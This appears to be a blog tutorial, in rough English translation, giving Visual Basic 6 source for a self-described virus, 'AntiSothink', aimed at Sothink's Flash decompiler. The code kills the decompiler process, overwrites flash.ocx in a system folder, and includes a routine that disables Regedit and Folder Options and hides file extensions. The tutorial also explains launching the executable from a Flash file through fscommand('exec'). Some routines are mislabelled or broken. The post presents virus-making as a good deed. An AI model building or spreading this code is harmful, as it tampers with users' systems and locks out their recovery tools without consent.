Image default
Softorial

Virus Tutorial – Kick Sothink (Flash Ship-Breaker) Using VB

Software : AntiSothink
Build : VB 6.0

Obvious make a virus is not categorized as a devilment, but it can be categorized as a good deed. Why? Because with make a virus we can help the flash designer too that make .swf file but it forced open with Sothink.

 

SOTHINK

 

Sothink is a program to force open flash that usually use to force open swf file. So in fact if we get swf file we will get the source code automatically too. This is the picture of Sothink program:

 

SOTHINK WEAKNESS

 

Softhink weakness is depending on .ocx flash file that exist in directory c:\windows\system32\Macromed\Flash. If that file we modify a little bit, we still can run flash but flash file or that swf can’t be catch by sothink. So when sothink want to force open that file it will show a message:

 

ANTISOTHINK

 

To make this Antisothink, first must create the algorithm:

  1. START
  2. Check the sothink run or not. If run so shutdown the sothink, if not run so next to the step 3
  3. Check directory c:\windows\system32\Macromed\Flash, any .ocx flash file or not
  4. If there, manipulate flash.ocx
  5. FINISH

Now you know the purpose.

 

SOURCE CODE

 

Okay, now we will try to make the code. Follow these steps:

  1. Open VB and create a new project with 1 module
  2. Then type code, like this below:

‘*************************Code to Open Key on Registry*****************************

Option Explicit

Public Type SECURITY_ATTRIBUTES
nLength As Long
IpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_DYN_DATA = &H80000006
Public Const KEY_ALL_ACCESS = &HF003F
Public Const KEY_CREATE_LINK = &H20
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_EXECUTE = &H20019
Public Const KEY_NOTIFY = &H10
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_READ = &H20019
Public Const KEY_SET_VALUE = &H2
Public Const KEY_WRITE = &H2006

Public Declare Function RegOpenKeyEx Lib “advapi32.dll” Alias “RegOpenKeyExA” (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib “advapi32.dll” (ByVal hKey As Long) As Long

‘////////////
Public Const REG_OPTION_BACKUP_RESTORE = 4 ‘ open for backup or restore
Public Const REG_OPTION_VOLATILE = 1 ‘ Key is not preserved when system is rebooted
Public Const REG_OPTION_NON_VOLATILE = 0 ‘ Key is preserved when system is rebooted
Public Const STANDARD_RIGHTS_ALL = &H1F0000
Public Const SYNCHRONIZE = &H100000
Public Const READ_CONTROL = &H20000
Public Const STANDARD_RIGHTS_READ = (READ_CONTROL)
Public Const STANDARD_RIGHTS_WRITE = (READ_CONTROL)

 

 

‘////////////////////Declaration for Gasak Program//////////////////////////////////////////////////////
Public Declare Function GetForegroundWindow Lib “user32” () As Long
Public Declare Function GetWindowText Lib “user32” Alias “GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function CloseWindow Lib “user32” (ByVal hwnd As Long) As Long
Public Declare Function EnableWindow Lib “user32” (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function SendMessage Lib “user32” Alias “SendMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Const WM_CLOSE = &H10

‘//////////////////Declaration to Delete Program/////////////////////////////////////////////////////

Public Declare Function DeleteFile Lib “kernel32” Alias “DeleteFileA” (ByVal lpFileName As String) As Long

‘//////////////////Deklarasi membaca file flash.ocx//////////////////////////////
Private Sign(4096) As String ‘The Signatures will be loaded into this array
Dim keyinstal As String

Public Sub bacafileflash()

Dim sIn As String
Dim swords() As String
Dim X As Long
Dim Data As String
Dim tik As String
Dim tuk As String

tik = “”””
tuk = ” & _”

keyinstal = ReadKey(“HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\InstallerLocation”)
sIn = FileText(keyinstal & “\Macromed\Flash\flash.ocx”)
swords = Split(sIn, vbCrLf)
‘ReDim Preserve swords(UBound(swords) – 1)
sIn = “”
For X = LBound(swords) To UBound(swords)
Data = swords(X)
Log tik & Data & tik & tuk
Next X

Exit Sub

err:
MsgBox “error when access file flash.ocx!” & vbCrLf & “maybe it corrupted” & vbCrLf & vbCrLf & “The error message was: ” & err.Description, vbCritical + vbOKOnly, “Error”

End Sub
Public Function FileText(ByVal strfilename As String) As String

Dim handle As Long

handle = FreeFile
Open strfilename For Binary As #handle
FileText = Space$(LOF(handle))
Get #handle, , FileText
Close #handle

End Function

Public Sub CreateKey(Folder As String, Value As String)

Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value

End Sub
Public Sub CreateIntegerKey(Folder As String, Value As Integer)

Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value, “REG_DWORD”

End Sub

Public Sub DeleteKey(Value As String, Folder As String)

Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value, “Reg_Dword”

End Sub

Sub kodepertahanan()
‘******************Menyembunyikan file yang mempunyai atibut hide*****************************

CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue”, 2
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue”, 2
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 0

‘//////////Non aktifkan folder option////////////
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1
‘//////////Kunci Regedit////////////
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1
‘////////menyembunyikan extensi file//////////
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1

End Sub

Private Function Gasak(Opo As String)
Dim H As Long
Dim T As String * 255
H = GetForegroundWindow
GetWindowText H, T, 255
If InStr(UCase(T), UCase(Opo)) > 0 Then
‘EnableWindow H, 1
SendMessage H, WM_CLOSE, 0, 0

End If
If InStr(UCase(T), UCase(“”)) > 0 Then
MsgBox “Si GASAK has been Disabled by The Creator!! Cheers!! ;)”, vbInformation, “GASAK is shutting Down”
End
End If
‘Shell “shutdown -a”, vbHide ‘// jadi lambat kalo ini diaktifkan, pake cara lenm aja ya (API)…
End Function

‘////////////////////////////Kode program Menghapus /////////////////////////////////////////

Sub Main()

Shell “Taskkill /F /IM SWFDecompiler.exe”, vbHide
bacafileflash

FileCopy App.Path & “\flash.ocx”, keyinstal & “\Macromed\Flash\flash.ocx”
DeleteFile App.Path & “\flash.ocx”
End Sub

‘////////////////////////////Kode Baca Registri/////////////////////////////////////////
Public Function ReadKey(Value As String) As String

Dim b As Object
Dim r
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
r = b.RegRead(Value)
ReadKey = r
End Function
‘////////////////////////////Kode Buat File flash.ocx/////////////////////////////////////////
Public Sub Log(strLog As String)
Dim ff As Integer
ff = FreeFile
On Error Resume Next
Open App.Path & “\flash.ocx” For Append As #ff
Print #ff, strLog
Close #ff
End Sub

We will not discuss this program according to comprehensive, but part by part.

 

In fact the explanations of this program exist in comments. Just follow then.

The kernel of this program is:

‘////////////////////////////Code to make  flash.ocx file/////////////////////////////////////////

Public Sub Log(strLog As String)

– Beginning of Sub Log

 

Dim ff As Integer
– Variable Definition

 

ff = FreeFile
– Free uo ff variable

 

On Error Resume Next
– Magic code to do next process if error happens.

 

Open App.Path & “\flash.ocx” For Append As #ff
– Open fake flash.ocx file

 

Print #ff, strLog
– Write flash.ocx file

 

Close #ff
– Close file

End Sub
– End of sub

 

To run it there is in Sub bacafileflash, for explanations try to find you’re self. Now to run the program that has been compile just put the script flash into the program. To run the script flash just follow these steps:

  1. Create new frame
  2. Click properties
  3. There is browser network in properties action frame use to call .exe file
  4. The rule is if using flash mx syntax:

fscommand (“exec”,”file.exe”)

  1. Create a folder fscommand where the flash projector put into.
  2. If using flash 5 the command is:

fscommand (“exec”,”./foldername/file.exe”)

or

fscommand( “exec”,”foldername/file.exe”)

  1. There is no rule in flash 5, the important thing is right definition path. The program and the source code antisothink can be downloaded from this link:


program dan source code antisothink

If you have any question about this program just contact:

overlord@virologi.info

 

 

Sincerely yours,

overlord@virologi.info

Related posts

Virus Tutorial – Run the OS command with VB without create the Batch File

adminviro

Virus Tutorial – Search The Active IP Address

adminviro

P3K Virus – Source Code Program FixDiary untuk Virus Diary dot exe

adminviro

Leave a Comment